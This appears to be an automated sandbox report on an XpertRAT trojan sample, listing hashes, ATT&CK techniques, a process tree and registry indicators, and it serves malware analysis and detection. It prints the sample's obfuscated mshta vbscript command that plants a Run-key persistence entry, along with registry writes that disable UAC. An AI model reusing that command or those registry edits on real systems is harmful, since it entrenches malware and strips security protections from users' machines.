xpertrat | 962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353

General

Target

962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe
Size

792KB
MD5

322b2bfde9f2f3d691b4fc1526182305
SHA1

99bf7caed11dee1bf41bd039634af9d1468e8f69
SHA256

962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353
SHA512

6fb915635d37375fd08aa854fb5a1e85ca9bdb6b7a7f5972bf0ea8e677dd24f6128003635626bb0036ef62f04afae7296230cac38adea880a7fa537d694cb132

Score

10^/10

xpertrat evasion persistence rat trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

Nonpresidential4.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Nonpresidential4.exe
Windows security bypass 2 TTPs 1 IoCs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

Nonpresidential4.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UACDisableNotify = "0" Nonpresidential4.exe
XpertRAT
XpertRAT is a remote access trojan with various capabilities.
rat xpertrat

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Nonpresidential4.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UACDisableNotify = "0"	Nonpresidential4.exe

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\R2J5B4T2-E112-W3Y0-J4F2-Q2U7V0F8S1P2 = "C:\\Users\\Admin\\AppData\\Roaming\\R2J5B4T2-E112-W3Y0-J4F2-Q2U7V0F8S1P2\\R2J5B4T2-E112-W3Y0-J4F2-Q2U7V0F8S1P2.exe"	iexplore.exe

Executes dropped EXE 2 IoCs

Processes:

Nonpresidential4.exeNonpresidential4.exe

pid process

4924 Nonpresidential4.exe
2636 Nonpresidential4.exe

pid	process
4924	Nonpresidential4.exe
2636	Nonpresidential4.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe

Windows security modification 2 TTPs 1 IoCs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

Nonpresidential4.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UACDisableNotify = "0" Nonpresidential4.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UACDisableNotify = "0"	Nonpresidential4.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\R2J5B4T2-E112-W3Y0-J4F2-Q2U7V0F8S1P2 = "C:\\Users\\Admin\\AppData\\Roaming\\R2J5B4T2-E112-W3Y0-J4F2-Q2U7V0F8S1P2\\R2J5B4T2-E112-W3Y0-J4F2-Q2U7V0F8S1P2.exe"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\R2J5B4T2-E112-W3Y0-J4F2-Q2U7V0F8S1P2 = "C:\\Users\\Admin\\AppData\\Roaming\\R2J5B4T2-E112-W3Y0-J4F2-Q2U7V0F8S1P2\\R2J5B4T2-E112-W3Y0-J4F2-Q2U7V0F8S1P2.exe"	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	iexplore.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Nonpresidential4.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Nonpresidential4.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Nonpresidential4.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

Nonpresidential4.exeNonpresidential4.exe

description	pid	process	target process
PID 4924 set thread context of 2636	4924	Nonpresidential4.exe	Nonpresidential4.exe
PID 2636 set thread context of 2976	2636	Nonpresidential4.exe	iexplore.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

Nonpresidential4.exe

pid process

2636 Nonpresidential4.exe
2636 Nonpresidential4.exe
2636 Nonpresidential4.exe
2636 Nonpresidential4.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

iexplore.exe

description pid process

Token: SeDebugPrivilege 2976 iexplore.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exeNonpresidential4.exeNonpresidential4.exeiexplore.exe

pid process

2244 962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe
4924 Nonpresidential4.exe
2636 Nonpresidential4.exe
2976 iexplore.exe

pid	process
2636	Nonpresidential4.exe
2636	Nonpresidential4.exe
2636	Nonpresidential4.exe
2636	Nonpresidential4.exe

description	pid	process
Token: SeDebugPrivilege	2976	iexplore.exe

pid	process
2244	962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe
4924	Nonpresidential4.exe
2636	Nonpresidential4.exe
2976	iexplore.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exeNonpresidential4.exeNonpresidential4.exe

description	pid	process	target process
PID 2244 wrote to memory of 3344	2244	962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe	mshta.exe
PID 2244 wrote to memory of 3344	2244	962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe	mshta.exe
PID 2244 wrote to memory of 3344	2244	962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe	mshta.exe
PID 2244 wrote to memory of 4924	2244	962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe	Nonpresidential4.exe
PID 2244 wrote to memory of 4924	2244	962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe	Nonpresidential4.exe
PID 2244 wrote to memory of 4924	2244	962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe	Nonpresidential4.exe
PID 4924 wrote to memory of 2636	4924	Nonpresidential4.exe	Nonpresidential4.exe
PID 4924 wrote to memory of 2636	4924	Nonpresidential4.exe	Nonpresidential4.exe
PID 4924 wrote to memory of 2636	4924	Nonpresidential4.exe	Nonpresidential4.exe
PID 4924 wrote to memory of 2636	4924	Nonpresidential4.exe	Nonpresidential4.exe
PID 4924 wrote to memory of 2636	4924	Nonpresidential4.exe	Nonpresidential4.exe
PID 4924 wrote to memory of 2636	4924	Nonpresidential4.exe	Nonpresidential4.exe
PID 4924 wrote to memory of 2636	4924	Nonpresidential4.exe	Nonpresidential4.exe
PID 4924 wrote to memory of 2636	4924	Nonpresidential4.exe	Nonpresidential4.exe
PID 4924 wrote to memory of 2636	4924	Nonpresidential4.exe	Nonpresidential4.exe
PID 2636 wrote to memory of 2976	2636	Nonpresidential4.exe	iexplore.exe
PID 2636 wrote to memory of 2976	2636	Nonpresidential4.exe	iexplore.exe
PID 2636 wrote to memory of 2976	2636	Nonpresidential4.exe	iexplore.exe
PID 2636 wrote to memory of 2976	2636	Nonpresidential4.exe	iexplore.exe
PID 2636 wrote to memory of 2976	2636	Nonpresidential4.exe	iexplore.exe
PID 2636 wrote to memory of 2976	2636	Nonpresidential4.exe	iexplore.exe
PID 2636 wrote to memory of 2976	2636	Nonpresidential4.exe	iexplore.exe
PID 2636 wrote to memory of 2976	2636	Nonpresidential4.exe	iexplore.exe

System policy modification 1 TTPs 1 IoCs
evasion

Modify Registry
T1112

Processes:

Nonpresidential4.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Nonpresidential4.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Nonpresidential4.exe

C:\Users\Admin\AppData\Local\Temp\962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe
"C:\Users\Admin\AppData\Local\Temp\962d681a9f42e1cd5245ca02d7114d4f7daf496ccbf17b2b37b7a94c58199353.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2244
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\:\Run\FORRENT"" : myKey = ""HKCU\Software\Microsoft\Windows\X\Run\NOME"" : myKey=replace(myKey,"":"",""CurrentVersion"") : WshShell.RegWrite myKey,""C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe"",""REG_SZ"" : window.close")
  2⤵
  PID:3344
- C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe
  "C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4924
- - C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe
    "C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe"
    3⤵
    - UAC bypass
    - Windows security bypass
    - Executes dropped EXE
    - Windows security modification
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:2636
  - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
      C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe
      4⤵
      Adds policy Run key to start application
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:2976

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

2

T1060

Privilege Escalation

Bypass User Account Control

1

T1088

Defense Evasion

Bypass User Account Control

1

T1088

Disabling Security Tools

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe

Filesize
792KB

MD5
1bb033c5e2b4a4bb05987306d78e0438

SHA1
4208031de927ba66e730a55236ec3750ad59c589

SHA256
5fb861fc7742dfb97b04558d23ab4c260eaf2c1178d811a429c86e18f38edb28

SHA512
c54635bb50a54b3d3bca430fc39431041a05484b98a0bb49e598a6fac8bc83000568496f09f6c0721a9690c51a4621df1eaaf83e94eaf06eeedfe289d3bfbadd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe

Filesize
792KB

MD5
1bb033c5e2b4a4bb05987306d78e0438

SHA1
4208031de927ba66e730a55236ec3750ad59c589

SHA256
5fb861fc7742dfb97b04558d23ab4c260eaf2c1178d811a429c86e18f38edb28

SHA512
c54635bb50a54b3d3bca430fc39431041a05484b98a0bb49e598a6fac8bc83000568496f09f6c0721a9690c51a4621df1eaaf83e94eaf06eeedfe289d3bfbadd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nonpresidential4.exe

Filesize
792KB

MD5
1bb033c5e2b4a4bb05987306d78e0438

SHA1
4208031de927ba66e730a55236ec3750ad59c589

SHA256
5fb861fc7742dfb97b04558d23ab4c260eaf2c1178d811a429c86e18f38edb28

SHA512
c54635bb50a54b3d3bca430fc39431041a05484b98a0bb49e598a6fac8bc83000568496f09f6c0721a9690c51a4621df1eaaf83e94eaf06eeedfe289d3bfbadd

Download Submit
memory/2244-137-0x00007FFE74910000-0x00007FFE74B05000-memory.dmp

Filesize
2.0MB

Download
memory/2244-138-0x00000000772B0000-0x0000000077453000-memory.dmp

Filesize
1.6MB

Download
memory/2636-140-0x0000000000000000-mapping.dmp

Download
memory/2636-141-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/2636-147-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/2636-149-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3344-132-0x0000000000000000-mapping.dmp

Download
memory/4924-133-0x0000000000000000-mapping.dmp

Download
memory/4924-144-0x00007FFE74910000-0x00007FFE74B05000-memory.dmp

Filesize
2.0MB

Download
memory/4924-145-0x00000000772B0000-0x0000000077453000-memory.dmp

Filesize
1.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads